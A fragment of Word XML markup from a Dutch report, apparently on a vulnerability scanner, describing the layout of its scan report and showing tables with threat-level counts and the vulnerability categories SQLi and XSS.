                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4229735</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4572635" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="489" name="Text Box 489"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4572635" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="50AEA057" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="004672F1" w:rsidRDefault="00CE4BB5" w:rsidP="00B3103C">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.20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AF690D" id="Text Box 489" o:spid="_x0000_s1102" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:44.3pt;margin-top:333.05pt;width:360.05pt;height:21.25pt;z-index:25202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IQ6MToCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0EWKE0IlSMimkSaivB&#10;1GfjOMSS7fNsQ8J+/c4OoV23p2kv5nx3/i73fXfM71utyEk4L8EUdDQYUiIMh1KaQ0G/79afZpT4&#10;wEzJFBhR0LPw9H7x8cO8sbkYQw2qFI4giPF5Ywtah2DzLPO8Fpr5AVhhMFiB0yzg1R2y0rEG0bXK&#10;xsPhNGvAldYBF96j96EL0kXCryrBw1NVeRGIKih+W0inS+c+ntlizvKDY7aW/PIZ7B++QjNpsOgV&#10;6oEFRo5O/gGlJXfgoQoDDjqDqpJcpB6wm9HwXTfbmlmRekFyvL3S5P8fLH88PTsiy4LezO4oMUyj&#10;SDvRBvIFWhJ9yFBjfY6JW4upocUAKt37PTpj423ldPzFlgjGkevzld8Ix9F5M7kdTz9PKOEYG0/v&#10;ZreTCJO9vrbOh68CNIlGQR3ql2hlp40PXWqfEot5ULJcS6XiJQZWypETQ62bWgZxAf8tS5mYayC+&#10;6gA7j0jDcqkSG+4ai1Zo922iaHplYw/lGclw0A2Ut3wtsfyG+fDMHE4Q9o9bEZ7wqBQ0BYWLRUkN&#10;7uff/DEfhcUoJQ1OZEH9jyNzghL1zaDkcXx7w/XGvjfMUa8AGx/hvlmeTHzggurNyoF+wWVZxioY&#10;YoZjrYKG3lyFbi9w2bhYLlMSDqllYWO2lkfonuZd+8KcvYgUUN5H6GeV5e+06nKTWnZ5DEh8EjIS&#10;27GIAxAvOOBpFC7LGDfo7T1lvf5lLH4BAAD//wMAUEsDBBQABgAIAAAAIQC8acZJ4AAAAAoBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI+xTsMwFEV3JP7BekgsiNqFyrXSOFVVwQBLRejC5sZunBLbke20&#10;4e95THR8ukf3nleuJ9eTs4mpC17CfMaAGN8E3flWwv7z9VEASVl5rfrgjYQfk2Bd3d6UqtDh4j/M&#10;uc4twRKfCiXB5jwUlKbGGqfSLAzGY3YM0amMZ2ypjuqC5a6nT4xx6lTnccGqwWytab7r0UnYLb52&#10;9mE8vrxvFs/xbT9u+amtpby/mzYrINlM+R+GP31UhwqdDmH0OpFeghAcSQmc8zkQBAQTSyAHCUuG&#10;Ea1Kev1C9QsAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAA&#10;AAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCshDoxOgIAAHoEAAAOAAAAAAAA&#10;AAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQC8acZJ4AAAAAoBAAAPAAAA&#10;AAAAAAAAAAAAAJIEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAnwUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="50AEA057" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="004672F1" w:rsidRDefault="00CE4BB5" w:rsidP="00B3103C">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.20</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A320702" w14:textId="77777777" w:rsidR="00655C62" w:rsidRDefault="00655C62">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="286F7915" w14:textId="7025837B" w:rsidR="000F4706" w:rsidRDefault="007B54EB" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Rapport Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6F4538" w14:textId="08645F50" w:rsidR="00BA3A8C" w:rsidRDefault="002F7070" w:rsidP="008571B9">
      <w:r>
        <w:t>Het rapport b</w:t>
      </w:r>
      <w:r w:rsidR="00C0502B">
        <w:t xml:space="preserve">estaat </w:t>
      </w:r>
      <w:r w:rsidR="005065D9">
        <w:t>minimaal uit twee pagina tot n pagina’</w:t>
      </w:r>
      <w:r w:rsidR="00C44B19">
        <w:t xml:space="preserve">s. </w:t>
      </w:r>
      <w:r w:rsidR="00AC680C">
        <w:t xml:space="preserve">De aantal pagina’s ligt aan de hoeveelheid gevonden kwetsbaarheden. </w:t>
      </w:r>
      <w:r w:rsidR="00662843">
        <w:t>De eerste pagina gebruikt standaard d</w:t>
      </w:r>
      <w:r w:rsidR="000805D2">
        <w:t>e data uit tabel 4.14 en 4.15</w:t>
      </w:r>
      <w:r w:rsidR="000E5D1E">
        <w:t>. Deze pagina is altijd één groot</w:t>
      </w:r>
      <w:r w:rsidR="000805D2">
        <w:t>. De tweede bevat de data uit tabel 4.16</w:t>
      </w:r>
      <w:r w:rsidR="000E5D1E">
        <w:t xml:space="preserve">, omdat dit een lijst met de geïdentificeerde kwetsbaarheden vertoont kan dit meer dan één </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000E5D1E">
        <w:t>pagina groot</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000E5D1E">
        <w:t xml:space="preserve"> zijn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5AB675" w14:textId="3C165542" w:rsidR="00706E60" w:rsidRDefault="00706E60" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A962C1">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252021760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25EDEAFB" wp14:editId="28859EFF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-74295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1840865</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5651500" cy="3202940"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="533" name="Text Box 533"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5651500" cy="3202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1967DA" w14:textId="36BE9F29" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                            <w:pPr>
                              <w:ind w:firstLine="708"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="001D7501">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Dreiginsniveau</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="11036D19" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                            <w:pPr>
                              <w:ind w:firstLine="708"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="4B7D0C6B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                            <w:pPr>
                              <w:ind w:firstLine="708"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="17524D23" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                            <w:pPr>
                              <w:ind w:firstLine="708"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:tbl>
                            <w:tblPr>
                              <w:tblStyle w:val="GridTable2-Accent3"/>
                              <w:tblW w:w="0" w:type="auto"/>
                              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
                            </w:tblPr>
                            <w:tblGrid>
                              <w:gridCol w:w="4302"/>
                              <w:gridCol w:w="4300"/>
                            </w:tblGrid>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="6424DE1A" w14:textId="77777777" w:rsidTr="00E17A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78E77FF5" w14:textId="41B6FCEA" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                                  <w:pPr>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>Totale</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve"> </w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>dreigementen</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve"> </w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>gevonden</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="04D49B39"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75696E46" w14:textId="6C0CFEF4" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                                  <w:pPr>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>Hoog</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4300" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="68B863AC" w14:textId="42640D64" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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2</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="4D7652D7" w14:textId="77777777" w:rsidTr="00E17A29">
                              <w:tc>
                                <w:tcPr>
                                  <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  <w:tcW w:w="4302" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="6B539619" w14:textId="2AF12018" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                                  <w:pPr>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>Gemiddeld</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4300" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="00B2265C" w14:textId="1BA63B58" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">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0</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="26E363CD"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4F54DD85" w14:textId="7F690E6F" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00137993">
                                  <w:pPr>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>Laag</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4300" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="05C30D57" w14:textId="604A18B2" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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0</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                          </w:tbl>
                          <w:p w14:paraId="415B2DEE" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:tbl>
                            <w:tblPr>
                              <w:tblStyle w:val="GridTable2-Accent3"/>
                              <w:tblW w:w="0" w:type="auto"/>
                              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
                            </w:tblPr>
                            <w:tblGrid>
                              <w:gridCol w:w="3038"/>
                              <w:gridCol w:w="3116"/>
                              <w:gridCol w:w="2458"/>
                            </w:tblGrid>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="5679F026" w14:textId="7FF416C1" w:rsidTr="00F21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29842537" w14:textId="13629C35" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                                  <w:pPr>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>Categorie</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve"> </w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>dreigementen</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="3118" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="4D9489DE" w14:textId="207F4D5A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                                  <w:pPr>
                                    <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>Dreigingsniveau</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2460" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="5219E4C5" w14:textId="548FBE28" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                                  <w:pPr>
                                    <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>Aantal</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="49B0474F" w14:textId="466A40BE" w:rsidTr="00F21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1EFECE3A" w14:textId="490F5FCA" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                                  <w:pPr>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>SQLi</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="3118" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="303A5A8B" w14:textId="1F97E029" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                    <w:rPr>
                                      <w:b/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>Hoog</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2460" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="7542976E" w14:textId="297EDB86" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">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1</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="3333A98F" w14:textId="16B85212" w:rsidTr="00F21CF7">
                              <w:tc>
                                <w:tcPr>
                                  <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  <w:tcW w:w="3039" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="0AAC801D" w14:textId="6DDAAD9C" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                                  <w:pPr>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:b w:val="0"/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>XSS</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="3118" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="16BB86EB" w14:textId="794322B8" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                    <w:rPr>
                                      <w:b/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:b/>
                                      <w:sz w:val="22"/>
                                      <w:lang w:val="en-US"/>
                                    </w:rPr>
                                    <w:t>Hoog</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2460" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="383140CD" w14:textId="02B8791A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">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1</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                          </w:tbl>
                          <w:p w14:paraId="2C214068" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="51799B0D" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D7501" w:rsidRDefault="00CE4BB5" w:rsidP="005A7A65">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz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EDEAFB" id="Text Box 533" o:spid="_x0000_s1103" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.85pt;margin-top:144.95pt;width:445pt;height:252.2pt;z-index:25202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XP0HsCAABmBQAADgAAAGRycy9lMm9Eb2MueG1srFRLTxsxEL5X6n+wfC+bB4ESsUEpiKoSAtRQ&#10;cXa8drKq7XHtSXbTX9+xdxNS2gtVL7vjmW/ej8ur1hq2VSHW4Eo+PBlwppyEqnarkn97uv3wkbOI&#10;wlXCgFMl36nIr2bv3102fqpGsAZTqcDIiIvTxpd8jeinRRHlWlkRT8ArR0INwQqkZ1gVVRANWbem&#10;GA0GZ0UDofIBpIqRuDedkM+yfa2VxAeto0JmSk6xYf6G/F2mbzG7FNNVEH5dyz4M8Q9RWFE7cnow&#10;dSNQsE2o/zBlaxkggsYTCbYArWupcg6UzXDwKpvFWniVc6HiRH8oU/x/ZuX99jGwuir5ZDzmzAlL&#10;TXpSLbJP0LLEowo1Pk4JuPAExZYE1Ok9PxIzJd7qYNOfUmIkp1rvDvVN5iQxJ2eT4WRAIkmy8Wgw&#10;ujjNHShe1H2I+FmBZYkoeaAG5rqK7V1ECoWge0jy5uC2NiY30bjfGATsOCpPQa+dMukizhTujEpa&#10;xn1VmqqQA0+MPH/q2gS2FTQ5QkrlMOec7RI6oTT5fotij0+qXVRvUT5oZM/g8KBsawchV+lV2NX3&#10;fci6w1P9jvJOJLbLNrf/PHcisZZQ7ajRAbpliV7e1tSMOxHxUQTaDmogbTw+0EcbaEoOPcXZGsLP&#10;v/ETnoaWpJw1tG0ljz82IijOzBdH43wxPKVRYJgfp5PzET3CsWR5LHEbew3UliHdFi8zmfBo9qQO&#10;YJ/pMMyTVxIJJ8l3yXFPXmN3A+iwSDWfZxAtpBd45xZeJtOpzGnUntpnEXw/j0ijfA/7vRTTV2PZ&#10;YZOmg/kGQdd5Zl+q2jeAljmPcn940rU4fmfUy3mc/QIAAP//AwBQSwMEFAAGAAgAAAAhAIAork3g&#10;AAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SOxaO20hDzKpEIgtqOUhsXPj&#10;aRIRj6PYbcLfY1awHN2je8+U29n24kyj7xwjJEsFgrh2puMG4e31aZGB8EGz0b1jQvgmD9vq8qLU&#10;hXET7+i8D42IJewLjdCGMBRS+rolq/3SDcQxO7rR6hDPsZFm1FMst71cKXUrre44LrR6oIeW6q/9&#10;ySK8Px8/PzbqpXm0N8PkZiXZ5hLx+mq+vwMRaA5/MPzqR3WootPBndh40SMskiSNKMIqy3MQkcjS&#10;bA3igJDmmzXIqpT/f6h+AAAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBA